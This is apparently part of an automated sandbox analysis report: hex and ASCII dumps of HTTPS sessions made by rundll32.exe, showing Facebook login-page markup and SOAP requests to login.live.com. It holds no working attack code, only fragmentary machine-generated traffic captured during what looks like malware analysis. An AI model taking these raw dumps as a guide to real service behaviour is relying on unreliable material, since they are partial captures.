                                                                                                                                                                                    Data Ascii: O-EPFYX4jwl43blK65OG3Yp97Y6PPbigs9Si8MGnzekRA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Google Chrome\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.microsoft.com\
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20232INData Raw: 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 75 73 5c 75 30 30 32 35 32 46 48 54 32 30 31 32 36 35 26 61 6d 70 3b 68 3d 41 54 32 59 69 34 6f 72 55 41 43 61 79 67 2d 67 64 35 34 48 48 42 4a 5f 38 4d 37 32 74 45 55 46 47 42 46 46 55 32 78 2d 70 68 67 49 6f 61 35 52 63 4c 78 72 7a 67 73 6f 4d 72 36 6e 6a 49 76 45 6b 63 45 64 63 7a 57 6c 66 6d 62 42 69 54 30 5a 47 45 30 69 41 5f 6f 54 49 52 39 74 4c 6a 54 30 2d 4a 70 43 4e 32 6b 62 76 42 31 4c 35 6c 34 63 58 49 6e 75 72 68 68 5f 43 59 6a 67 6a 59 6b 35 30 33 31 45 41 6d 5f 62 41 68 77 58 5f 53 2d 2d 43 5a 70 44
                                                                                                                                                                                    Data Ascii: /l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-us\u00252FHT201265&amp;h=AT2Yi4orUACayg-gd54HHBJ_8M72tEUFGBFFU2x-phgIoa5RcLxrzgsoMr6njIvEkcEdczWlfmbBiT0ZGE0iA_oTIR9tLjT0-JpCN2kbvB1L5l4cXInurhh_CYjgjYk5031EAm_bAhwX_S--CZpD
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20234INData Raw: 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 22 7d 2c 39 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 4e 42 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e 65 73 69 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 58 77 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 61 6e 73 6b 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 6f 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 65 75 74 73 63 68 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 74 32 22 2c 7b 22 5f 5f
                                                                                                                                                                                    Data Ascii: ies\u003C\/button>\u003C\/div>\u003C\/div>\u003C\/div>"},9],["__markup_3310c079_0_0_NB",{"__html":"Bahasa Indonesia"},1],["__markup_3310c079_0_1_Xw",{"__html":"Dansk"},1],["__markup_3310c079_0_2_oh",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_t2",{"__
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20235INData Raw: 38 54 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 59 46 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 74 38 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 6f 79 22 2c 7b 22 5f 5f 68 74 6d 6c
                                                                                                                                                                                    Data Ascii: 8T",{"__html":"\u05e2\u05d1\u05e8\u05d9\u05ea"},1],["__markup_3310c079_0_o_YF",{"__html":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629"},1],["__markup_3310c079_0_p_t8",{"__html":"\u0939\u093f\u0928\u094d\u0926\u0940"},1],["__markup_3310c079_0_q_oy",{"__html
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20237INData Raw: 64 5f 46 49 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 45 43 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 39 74 22 2c 22 75 5f 30 5f 65 5f 2b 30 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 45 43 22 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 53 65 72 76 69 63 65 57 6f 72 6b 65 72 4c 6f 67 69 6e 41 6e 64 4c 6f 67 6f 75 74 22 2c 22 6c 6f 67 69 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 22 2c 22 73 65 74 22 2c 5b 5d 2c 5b 22 58 57 65 62 4c 6f 67 69 6e 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 39 36 65 38 38 61 66 33 22 2c 7b 22 69 6d 70 5f 69 64 22 3a 22 31 61 4a 4d 33 6d 6d 34 4c 78 31 71 49 36 65 45 57 22 2c 22 65 66 5f 70 61 67
                                                                                                                                                                                    Data Ascii: d_FI",1,"__markup_9f5fac15_0_0_EC"],["__elem_45d73b5d_0_0_9t","u_0_e_+0",1,"__markup_9f5fac15_0_0_EC"]],"require":[["ServiceWorkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XWebLoginController","96e88af3",{"imp_id":"1aJM3mm4Lx1qI6eEW","ef_pag
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20238INData Raw: 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 73 77 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 73 77 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 62 7a 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 6b 59 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 62 7a 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 6b 59 22 7d 2c 6e 75 6c 6c 2c 74 72 75 65 2c 7b 22 70 75 62 4b 65 79 22 3a 7b 22 70 75 62 6c 69 63 4b 65 79 22 3a 22 66 35 38 34 36 62 64 39
                                                                                                                                                                                    Data Ascii: ,["__elem_f46f4946_0_1_sw"],[{"__m":"__elem_f46f4946_0_1_sw"}]],["LoginFormController","init",["__elem_835c633a_0_0_bz","__elem_45d73b5d_0_2_kY"],[{"__m":"__elem_835c633a_0_0_bz"},{"__m":"__elem_45d73b5d_0_2_kY"},null,true,{"pubKey":{"publicKey":"f5846bd9
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20239INData Raw: 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61
                                                                                                                                                                                    Data Ascii: ._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFa
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20241INData Raw: 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 32 2f 6c 2f 30 2c 63 72 6f 73 73 2f 57 5f 66 33 7a 51 30 43 63 36 65 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 72 2f 52 2d 70 6f 45 50 65 44 52 31 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69
                                                                                                                                                                                    Data Ascii: as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/W_f3zQ0Cc6e.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/R-poEPeDR18.js?_nc_x=Ij3Wp8lg5Kz" as="scri
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20242INData Raw: 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 6c 75 73 68 5f 70 61 67 65 6c 65 74 73 5f 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 39 4c 4d 73 75 59 70 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d
                                                                                                                                                                                    Data Ascii: sh":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><script nonce="j9LMsuYp">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})}
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20244INData Raw: 31 32 38 37 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 39 4c 4d 73 75 59 70 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 39 4c 4d 73 75 59 70 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                                                                                    Data Ascii: 1287<script nonce="j9LMsuYp">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="j9LMsuYp">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20245INData Raw: 37 49 70 4c 56 2d 76 64 66 71 4a 74 70 6b 39 68 6c 6a 6a 38 67 72 50 34 2d 54 42 30 38 4f 73 64 37 49 56 50 79 33 6d 78 65 42 31 6e 77 2d 72 52 65 76 32 75 6a 47 6a 6f 39 53 6e 68 43 6f 39 78 4b 38 70 69 33 54 61 5a 69 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 56 63 45 4a 47 5f 51 65 43 34 33 37 79 6b 37 49 70 4c 56 2d 76 64 66 71 4a 74 70 6b 39 68 6c 6a 6a 38 67 72 50 34 2d 54 42 30 38 4f 73 64 37 49 56 50 79 33 6d 78 65 42 31 6e 77 2d 72 52 65 76 32 75 6a 47 6a 6f 39 53 6e 68 43 6f 39 78 4b 38 70 69 33 54 61 5a 69 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                                                                                    Data Ascii: 7IpLV-vdfqJtpk9hljj8grP4-TB08Osd7IVPy3mxeB1nw-rRev2ujGjo9SnhCo9xK8pi3TaZiI"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2VcEJG_QeC437yk7IpLV-vdfqJtpk9hljj8grP4-TB08Osd7IVPy3mxeB1nw-rRev2ujGjo9SnhCo9xK8pi3TaZiI"]},-1],["cr:1083117",[],{
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20246INData Raw: 65 32 7a 49 46 67 64 74 48 49 68 51 41 47 52 57 50 72 52 33 6a 4b 46 43 4a 2d 38 4d 63 64 34 69 51 5f 59 75 66 39 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65
                                                                                                                                                                                    Data Ascii: e2zIFgdtHIhQAGRWPrR3jKFCJ-8Mcd4iQ_Yuf9Q"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_e
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20248INData Raw: 37 30 7a 44 4c 75 2d 34 63 4a 70 65 32 7a 49 46 67 64 74 48 49 68 51 41 47 52 57 50 72 52 33 6a 4b 46 43 4a 2d 38 4d 63 64 34 69 51 5f 59 75 66 39 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 39 31 53 73 52 48 34 59 67 59 4e 4f 39 6e 36 45 72 4a 55 69 63 6e 68 50 63 6c 45 5f 6b 37 30 7a 44 4c 75 2d 34 63 4a 70 65 32 7a 49 46 67 64 74 48 49 68 51 41 47 52 57 50 72 52 33 6a 4b 46 43 4a 2d 38 4d 63 64 34 69 51 5f 59 75 66 39 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 33 0d 0a 66 33 65 0d
                                                                                                                                                                                    Data Ascii: 70zDLu-4cJpe2zIFgdtHIhQAGRWPrR3jKFCJ-8Mcd4iQ_Yuf9Q"]},-1],["cr:983844",[],{__rc:[null,"Aa291SsRH4YgYNO9n6ErJUicnhPclE_k70zDLu-4cJpe2zIFgdtHIhQAGRWPrR3jKFCJ-8Mcd4iQ_Yuf9Q"]},-1],["cr:5278",["ReactDOM-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa3f3e
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20249INData Raw: 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 56 63 45 4a 47 5f 51 65 43 34 33 37 79 6b 37 49 70 4c 56 2d 76 64 66 71 4a 74 70 6b 39 68 6c 6a 6a 38 67 72 50 34 2d 54 42 30 38 4f 73 64 37 49 56 50 79 33 6d 78 65 42 31 6e 77 2d 72 52 65 76 32 75 6a 47 6a 6f 39 53 6e 68 43 6f 39 78 4b 38 70 69 33 54 61 5a 69 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 42 44 43 6c 69 65 6e 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 54 72
                                                                                                                                                                                    Data Ascii: cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2VcEJG_QeC437yk7IpLV-vdfqJtpk9hljj8grP4-TB08Osd7IVPy3mxeB1nw-rRev2ujGjo9SnhCo9xK8pi3TaZiI"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTr
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20251INData Raw: 71 49 71 2d 33 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 35 49 4f 32 59 77 61 74 6c 74 59 48 6c 77 4b 34 74 4b 68 39 51 77 6e 6c 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 5d 7d 2c 68 73 72 70 3a 7b 68 73 64 70 3a 7b 63 6c 70 44 61 74 61 3a 7b 22 31 37 34 33 30 39 35 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 37 31 36 39 37 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 32 39 33 31 39 22 3a 7b 72 3a 31 7d 2c 22 31 38 32 39 33 32 30 22 3a 7b 72 3a 31 7d 2c 22 31 38 34 33 39 38 38 22 3a 7b 72 3a
                                                                                                                                                                                    Data Ascii: qIq-3",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","5IO2YwatltYHlwK4tKh9Qwnl",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20252INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    8192.168.2.44970420.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:04 UTC159OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:04 UTC160OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:04 UTC171INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:04 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 167644ad-ddec-4140-80de-a0819ba13173
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF000066CF V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:03 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11296
                                                                                                                                                                                    2023-01-05 07:57:04 UTC171INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    9192.168.2.44970320.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:04 UTC163OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 4740
                                                                                                                                                                                    Host: login.live.com
